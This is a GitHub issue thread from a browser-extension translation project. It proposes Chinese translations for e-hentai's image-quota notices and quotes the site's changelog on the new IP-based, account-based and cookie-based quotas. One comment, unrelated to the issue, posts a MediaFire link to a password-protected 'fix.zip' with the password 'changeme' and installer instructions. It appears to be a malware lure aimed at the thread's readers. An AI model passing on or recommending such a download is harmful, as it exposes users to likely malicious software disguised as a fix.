### ISSUE TITLE
配额界面文本更新

### ISSUE THREAD

**Issue by 1235789gzy1** [EhTagTranslation/EhSyringe#1265]
**相关页面**
https://e-hentai.org/home.php
**原文**
分为两种文本
包含配额的文本仅适用于 不以IP计算 的配额
![image](https://github.com/user-attachments/assets/5b0c9ecc-eb15-42e8-8460-518d8faba8c2)

```
Due to widespread usage of bulk downloaders, high-resolution images can be limited.

You are currently at 0 towards your account limit of 50,000.

You can reset your image quota by spending 0 GP.
```
另一种为使用 基于IP计算的配额
![image](https://github.com/user-attachments/assets/7f76e846-aa31-4475-8444-e50d2c81fe5e)

```
Due to widespread usage of bulk downloaders, high-resolution images can be limited.

You are currently using IP-based limits. No restrictions are currently in effect.

You can get a Bronze Star or the More Pages hathperk to tie image limits to your account.

Alternatively, you can unlock a high-resolution quota for 24 hours by spending 20,000 GP.

Note that for the latter, clearing your cookies will revert you to IP-based limits.
```
**翻译**
- 首先是两种版本都包含的文本
```
Due to widespread usage of bulk downloaders, high-resolution images can be limited.
```
由于批量下载器的滥用，高分辨率图像可能会受到限制。

- 不使用IP计算的文本

您当前的账户限制为 XXXX，已使用 XXXX。

您可以花费0 GP来重置您的图像配额。

- 使用IP计算的文本

您当前使用的是基于IP的限制。目前没有任何限制生效。

您可以获取铜星或“更多页面”特权，将图像限制与您的账户绑定。

或者，您可以花费 20,000 GP 解锁24小时的高分辨率配额。

请注意，对于后者，清除您的cookies将会使您回到基于IP的限制。

**Comment by 1235789gzy1** [comment]
EH上对此次配额系统更改的日志
[网站更新日志](https://forums.e-hentai.org/index.php?showtopic=244935)
2024-08-26

- The cutoff for when quotas can be used on archives is now one year after the gallery was posted (increased from 30 days), matching the cutoff for the H@H downloader.

- Extra re-creation costs are no longer applied to archives for galleries posted in the last year (increased from 30 days) or archives downloaded in the last 90 days (increased from 30 days).

- The way the image downloading limits work have been reworked, mainly to address various issues caused by an increase in IP address sharing due to increased use of CG-NAT and VPNs.

The old system had two modes, an account-based quota for donators and an IP-based quota for everyone else. This had a few notable quirks, like how if non-donators spent GP to reset the quota, it could be consumed by someone else sharing the same IP address.

The new system has three modes:

* Donators and people with the More Pages hathperk have an account-based quota, like what donators had before.

* Everyone else defaults to an IP-based quota, similar to before. However;

* People who do not have an account-based quota and spend the GP to "reset" it are now assigned a dedicated quota for 24 hours, set with a cookie-based token. Meaning that if you spend GP, the resulting quota can no longer be used by anyone else.

Furthermore, the behavior when you hit the limit has changed:

If you hit the limit while browsing normally, it will no longer error out with a 509 "bandwidth exceeded" screen as long as H@H is enabled. Instead, it will force using the 1280x resampled version even if the image size settings are set higher than this.

If you hit the limit while downloading source images, it will start automatically charging GP for this in the background like before, erroring out if you don't have any. If H@H is disabled, it will also still error out with the 509 "bandwidth exceeded" screen when browsing.

In other words, unless you have the image size setting at "prefer original images" or above 1280x, or H@H is disabled, hitting the limit while browsing will have no effect. Though you could still trigger the DDoS protection if you overdo it.

For IP-based quotas, it will no longer show what the limit is. This is intentional. It will however explicitly tell you on the home screen if your IP is currently restricted from using high-resolution images.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 1235789gzy1** [comment]
注意:两种文本的按钮不同,一种是 重置配额 另一种是 解锁配额

**Comment by 1235789gzy1** [comment]
(设置界面)[https://e-hentai.org/uconfig.php]似乎也有一些小改动
![image](https://github.com/user-attachments/assets/b3e54081-ac65-4d3d-bca0-51ad3dac58b1)
